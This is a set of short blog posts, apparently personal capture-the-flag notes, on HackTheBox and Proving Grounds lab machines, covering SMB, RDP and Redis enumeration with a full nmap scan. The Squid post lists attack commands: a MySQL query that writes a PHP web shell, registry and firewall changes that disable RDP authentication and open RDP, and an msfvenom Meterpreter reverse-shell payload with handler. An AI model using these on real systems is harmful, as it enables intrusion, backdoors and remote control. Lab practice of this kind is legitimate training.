Sphinx

May 19, 2024

Dancing Machine

Dancing Machine

HTB/STARTING_POINT

In this machine we learn to enumerate SMB file shares.

To list shares

kali@kali:~$ smbclient -L //<serverIP/name> -N

To download all file to a backup file become handing when u have a large file system

kali@kali:~$ smbclient //<serverIP/name>/<shareDisk> -N -Tc backup.tar
posted at 19:10  · 

May 19, 2024

Explosion Machine

Explosion

HTB/STARTING_POINT

This machine teach you how to interact with RDP protocol and enumerate it .

Let’s start by map to scan all open ports, since this machine is focused on RDP , we will reduce time by specifying the port on 3389 ;
posted at 19:10  · 

May 19, 2024

Redeemer Machine

Redeemer

HTB/STARTING_POINT

This machine show you how to interact with a Redis server .

Doing Nmap scan show open port and specifically redid port open on :

kali@kali:~$ nmap -sC -sV -T4 -p- -oA nmap/Redeemer <serverIp>

Result :

# Nmap 7.93 scan initiated Thu Aug 24 02:07:23 2023 as: nmap -sC -sV -T4 -p- -oA nmap/Redeemer 10.129.6.102
Warning: 10.129.6.102 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.6.102
Host is up (0.11s latency).
Not shown: 65526 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
6379/tcp  open     redis   Redis key-value store 5.0.7
23201/tcp filtered unknown
23819/tcp filtered unknown
25153/tcp filtered unknown
34008/tcp filtered unknown
35903/tcp filtered unknown
39049/tcp filtered unknown
40140/tcp filtered unknown
47535/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 24 02:25:02 2023 -- 1 IP address (1 host up) scanned in 1059.07 seconds

Connect to redis ;

kali@kali:~$ redis-cli -h <hostname/ip>

Get all db ;

redis-cli> config get databases

Get existed keys with correspond db index;

redis-cli> info keyspace

Select desired db;

redis-cli> select <N>

Get info on Redis server;

redis-cli> info

Dump all keys;

redis-cli> keys *

Get random keys;

redis-cli> randomkey

Print specified key value;

redis-cli> get <keyname>
posted at 19:10  · 

May 19, 2024

Squid Machine

SQUID - MACHINE / PG

PG/easy_windows

This machine a proxy named squid that proxy all network traffic from outside . It operate on port 3128

Mysql 3306:

SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"

Disable NLA;

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

Enable RDP on owned machine:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="remote desktop" new enable=yes

Reverse Shell with Meterpreter:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.17 LPORT=4444 --format=exe > evil.exe

msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set LHOST 192.168.0.17
msf5> set LPORT 4444
msf5> run
posted at 19:10  ·